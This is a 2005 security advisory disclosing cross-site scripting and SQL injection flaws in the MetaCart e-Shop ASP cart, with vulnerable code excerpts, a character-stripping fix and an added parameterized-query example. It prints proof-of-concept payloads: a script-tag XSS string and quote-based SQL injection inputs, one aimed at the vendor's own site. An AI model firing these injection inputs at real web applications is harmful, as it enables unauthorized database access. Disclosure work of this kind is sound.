____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_13$2005
---------------------------------------------------------------------------
Multiple Vulnerabilities in MetaCart e-Shop
---------------------------------------------------------------------------
Author: Dedi Dwianto
Date: May 16th, 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv13-theday-2005.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : MetaCart e-Shop
Version : all versions of MetaCart e-Shop products
url : http://www.metalinks.com
Author: MetaLinks Online Design
Description:
MetaCart e-Shop is a shopping cart application for small businesses
that supports MS SQL, MS Access and MySQL.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Cross-Site Scripting (XSS)
File productsByCategory.asp
http://[url]/mcartlite/productsByCategory.asp?intCatalogID=1&strCatalog_NAME=<script>alert('test')</script>
Problem Script productsByCategory.asp
--------------
strCatalog_name = Request.QueryString("strCatalog_NAME")
...
...
strParam = Response.Write (rsCatalog("catalogID")) &strCatalog_NAME=Response.Write
(Server.URLEncode(rsCatalog("catalogName"))) &rsCatalog("catalogName")
--------------
B. SQL Injection
File productsByCategory.asp
http://[url]/mcartlite/productsByCategory.asp?strSubCatalogID=2'(Sql Injection)
Problem Script
---------------
intCatalogID = Request.QueryString("intCatalogID")
...
...
' Build SQL String using the parameters
strSQL = "SELECT productID,productName,productPrice FROM products WHERE catalogID = '"&strParam&"'"
---------------
Ex : http://www.metalinks.com/mcartlite/productsByCategory.asp?strSubCatalogID=2'having 1=1--
Error :
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression '1=1--''.
/mcartlite/productsByCategory.asp, line 114
File product.asp
http://[url]/mcartlite/product.asp?intProdID=1'(SQL Injection)
Problem Script product.asp line 102
---------------
intProdID = Request.QueryString("intProdID")
...
...
Set rsProdInfo = Conn.Execute("SELECT * FROM " & _
"products where productID="&intProdID)
if rsProdInfo.EOF then
Response.Write "Product Number " & intProdID & _
" does not exist."
---------------
C. Solution
Use Replace() to strip the offending characters from the request parameters:
- productsByCategory.asp
* Find
intCatalogID = Request.QueryString("intCatalogID")
After it, add
intCatalogID = Replace(intCatalogID,"'","")
* Find
strCatalog_name = Request.QueryString("strCatalog_NAME")
After it, add
strCatalog_name = Replace(strCatalog_NAME,"<","")
- product.asp
* Find
intProdID = Request.QueryString("intProdID")
After it, add
intProdID = Replace(intProdID,"'","")
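A more robust fix than stripping characters, given here as an added example that is not the vendor's code or the advisory author's: validate the numeric IDs, bind them as ADODB parameters instead of concatenating them into the SQL string, and HTML-encode the catalog name at the point where it is written to the page. It assumes an open ADODB.Connection named Conn (as product.asp uses), the table and column names quoted in the advisory, and that catalogID and productID are integer columns; the helper names IsPositiveIntegerID, QueryByIntegerID and RejectRequest are this example's own.

```vbscript
<%
' Added example (not MetaCart's code): hardened versions of the two
' lookups quoted in the advisory. Assumes an open ADODB.Connection
' named Conn, as in product.asp.
Option Explicit

' ADO constants used below, so adovbs.inc is not required
Const adCmdText = 1
Const adInteger = 3
Const adParamInput = 1

' Accept only a short run of digits: this rejects quotes, spaces,
' signs and exponent forms that IsNumeric() would let through.
Function IsPositiveIntegerID(value)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[1-9][0-9]{0,8}$"
    IsPositiveIntegerID = re.Test(CStr(value))
End Function

' Run a one-parameter SELECT with the value bound as an integer
' parameter, so the database engine never parses it as SQL text.
Function QueryByIntegerID(sql, idValue)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = Conn
    cmd.CommandType = adCmdText
    cmd.CommandText = sql
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CLng(idValue))
    Set QueryByIntegerID = cmd.Execute
End Function

' Stop the request before the database is touched
Sub RejectRequest(message)
    Response.Status = "400 Bad Request"
    Response.Write Server.HTMLEncode(message)
    Response.End
End Sub

' --- product.asp ---
Dim intProdID, rsProdInfo
intProdID = Request.QueryString("intProdID")
If Not IsPositiveIntegerID(intProdID) Then RejectRequest "Invalid product ID."

Set rsProdInfo = QueryByIntegerID("SELECT * FROM products WHERE productID = ?", intProdID)
If rsProdInfo.EOF Then
    ' Encode on output even though validation already limited the value to digits
    Response.Write "Product Number " & Server.HTMLEncode(intProdID) & " does not exist."
End If

' --- productsByCategory.asp ---
Dim intCatalogID, strCatalogName, rsProducts
intCatalogID = Request.QueryString("intCatalogID")
strCatalogName = Request.QueryString("strCatalog_NAME")
If Not IsPositiveIntegerID(intCatalogID) Then RejectRequest "Invalid catalog ID."

Set rsProducts = QueryByIntegerID( _
    "SELECT productID, productName, productPrice FROM products WHERE catalogID = ?", intCatalogID)

' The catalog name is display-only: HTML-encode it where it is written to the page
Response.Write "<h2>" & Server.HTMLEncode(strCatalogName) & "</h2>"
%>
```

Two points explain why this goes beyond the Replace() fix above. In product.asp the ID is concatenated into the query without surrounding quotes, so removing the single quote character does not change what the database receives for a non-numeric value; a whitelist check on the format of the ID, together with a bound parameter, addresses that regardless of how the value is quoted. For the catalog name, removing "<" only covers one HTML context; encoding at output time handles every character the browser could interpret, whichever context the value lands in.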
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ Lieur Euy , MSR
~ [email protected] ,
~ #e-c-h-o@DALNET
---------------------------------------------------------------------------
Contact:
~~~~~~~~
the_day || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------